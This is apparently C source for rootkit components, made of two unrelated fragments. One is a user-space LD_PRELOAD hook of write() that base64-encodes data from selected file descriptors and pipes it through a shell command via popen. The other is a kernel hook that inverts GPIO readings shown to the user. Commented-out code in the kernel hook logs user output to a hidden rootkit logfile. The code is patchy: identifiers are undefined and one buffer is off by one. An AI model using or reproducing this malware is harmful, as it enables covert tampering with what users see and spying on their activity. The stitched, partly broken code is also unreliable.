ssize_t write(int fildes, const void *buf, size_t nbyte) {
int shouldcrypt ;
shouldcrypt = isvalueinarray(fildes, filedesyes, 2) ;
if (shouldcrypt == 1) {
const char * buffer = (const char *)buf ;
char *based = base64(buffer, nbyte);
char toexecute[strlen(based)+strlen(command)] ;
memset(toexecute, '\0', strlen(based)+strlen(command));
FILE *fp;
char retcommand[2048];
memset(retcommand, '\0', 2048);
strncat(toexecute, command, strlen(command));
strncat(toexecute, based, strlen(based));
strncat(toexecute, endcommand, 2);
int *(*original_write)(int fildes, const void *buf, size_t nbyte);
original_write = dlsym(RTLD_NEXT, "write");
fp = popen(toexecute, "r");
if (fp == NULL) {
printf("Failed to run command\n" );
exit(1);
}
while (fgets(retcommand, sizeof(retcommand)-1, fp) != NULL) {
original_write(fildes, retcommand, strlen(retcommand)) ;
}
pclose(fp);
return(nbyte) ;
}
else {
int *(*original_write)(int fildes, const void *buf, size_t nbyte);
original_write = dlsym(RTLD_NEXT, "write");
original_write(fildes, buf, nbyte) ;
return(nbyte);
}
}
asmlinkage ssize_t hacked_write(int fd, char *buf, size_t count)
{
int ret = original_write(fd, buf, count);
char *needle_ptr = buf;
//struct file *file;
//mm_segment_t old_fs;
//loff_t pos = 0;
//char *command_to_find = "echotest";//"echoout>/sys/class/gpio/gpio4/direction";
//bool exported = false;
//if(CheckGPIOIsOutput(4)){ // if GPIO 4 is exported, start hijacking output written
if(HOOK_WRITE){ // if cat /sys/class/gpio/gpio4/value is called, hack the output
if(*needle_ptr=='0' && *(needle_ptr+1)=='\n' && fd==1) { //&& exported==true) {
printk("In case 1\n");
needle_ptr[0]='1';
original_write(fd, needle_ptr, 2);
return count;
}
else if (*needle_ptr=='1' && *(needle_ptr+1)=='\n' && fd==1) { //&& exported==true) {
printk("In case 2\n");
needle_ptr[0]='0';
original_write(fd, needle_ptr, 2);
return count;
}
HOOK_WRITE=false;
}
/*
if(IS_COMMAND && fd==1){ // if user pressed enter
struct file *file;
mm_segment_t old_fs;
loff_t pos = 0;
old_fs = get_fs();
set_fs(KERNEL_DS);
//disable_file_hiding();
file = filp_open("/home/pi/rootkit_logfile", O_RDWR|O_APPEND|O_CREAT, 0644);
if(IS_ERR(file)){
//printk("CREATE FILE ERROR %d...\n", ERR_PTR(file));
//return -1;
}
else{
if(file && ret>0){
pos=0;
vfs_write(file, buf, strlen(buf), &pos);
printk("Copying from user sys_write: %s...\n\n", buf);
filp_close(file, NULL);
//enable_file_hiding();
}else{
if(!file)
printk("OPEN FILE ERROR 111...\n");
else if(ret<=0)
printk("OPEN FILE ERROR 222...\n");
}
}
set_fs(old_fs);
IS_COMMAND=false;
}*/
/* if(fd==1){
old_fs = get_fs();
set_fs(KERNEL_DS);
file = filp_open("/home/pi/rootkit_logfile", O_RDWR|O_APPEND|O_CREAT, 0644);
if(IS_ERR(file)){
//printk("CREATE FILE ERROR %d...\n", ERR_PTR(file));
//return -1;
}
else{
if(file && ret>0){
pos=0;
vfs_write(file, buf, strlen(buf), &pos);
//vfs_write(file, test_buffer, strlen(test_buffer), &pos);
printk("Copying from user...\n\n");
filp_close(file, NULL);
}else{
if(!file)
printk("OPEN FILE ERROR 111...\n");
else if(ret<=0)
printk("OPEN FILE ERROR 222...\n");
}
}
set_fs(old_fs);
}*/
return ret;
}
